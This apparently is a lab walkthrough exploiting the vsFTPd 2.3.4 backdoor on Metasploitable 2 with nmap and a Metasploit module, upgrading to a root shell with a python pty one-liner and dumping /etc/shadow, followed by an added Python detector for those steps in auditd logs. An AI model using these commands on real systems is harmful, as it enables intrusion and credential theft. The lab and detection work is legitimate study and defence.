Identifying and Exploiting Vulnerable Services

Exploiting Linux-based systems:

1. Fire up Metasploitable 2 Linux.
2. Scan the target using nmap:

   ```
   nmap -A -p 21 172.30.1.134
   ```

3. Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4.
4. Search Google for `vsftpd 2.3.4 exploit`. There is an exploit module from Rapid7 itself.
5. Open up msfconsole:

   ```
   sudo msfconsole
   msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
   ```

6. Upgrade the shell using the command:

   ```
   python -c 'import pty; pty.spawn("/bin/bash")'
   ```

7. Got a root shell on the target system and dumped the /etc/shadow file, where the hashes of the users' passwords are stored.
8. Save the credentials into a text file, making sure to edit out the unnecessary users from the output: ...
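
A defender-side view of steps 6 and 7, as an added example that is not part of the original post: a Python scan of auditd `EXECVE` records for the `pty.spawn` shell upgrade and for commands that name `/etc/shadow`. The log lines are constructed, and the rule labels and function names are assumptions made for this sketch.

```python
import re

# auditd writes simple arguments quoted (a0="ls") but hex-encodes any argument
# containing spaces or quotes, so a plain grep for "pty.spawn" misses step 6.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r"audit\([\d.]+:(\d+)\)")

def decode_args(record):
    """Return argv from one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(record):
        value = quoted
        if hexed:
            try:
                value = bytes.fromhex(hexed).decode("utf-8", "replace")
            except ValueError:          # odd-length run: keep the raw text
                value = hexed
        args[int(idx)] = value
    return [args[i] for i in sorted(args)]

def classify(argv):
    """Label an argv that matches step 6 or step 7 of the walkthrough."""
    if not argv:
        return None
    prog, rest = argv[0].rsplit("/", 1)[-1], argv[1:]
    if prog.startswith("python") and any("pty.spawn" in a for a in rest):
        return "pty-shell-upgrade"
    if "/etc/shadow" in rest:
        return "shadow-file-access"
    return None

def scan(log_text):
    """Return (audit event id, label) for every suspicious EXECVE record."""
    hits = []
    for line in log_text.splitlines():
        event = EVENT_RE.search(line)
        if "type=EXECVE" in line and event:
            label = classify(decode_args(line))
            if label:
                hits.append((int(event.group(1)), label))
    return hits

def _hexarg(text):                      # helper used only to build sample data
    return text.encode().hex().upper()

SAMPLE = "\n".join([                    # constructed records, not real logs
    'type=EXECVE msg=audit(1763970000.101:501): argc=2 a0="ls" a1="-la"',
    'type=EXECVE msg=audit(1763970004.220:502): argc=3 a0="python" a1="-c" a2='
    + _hexarg('import pty; pty.spawn("/bin/bash")'),
    'type=EXECVE msg=audit(1763970009.874:503): argc=2 a0="cat" a1="/etc/shadow"',
    'type=EXECVE msg=audit(1763970012.010:504): argc=3 a0="python3" a1="-c" a2='
    + _hexarg('print("hi")'),
])
```

A match on either label coming from a process whose parent is the FTP daemon is worth immediate triage, since a file-transfer service has no reason to spawn an interpreter or read password hashes.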

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th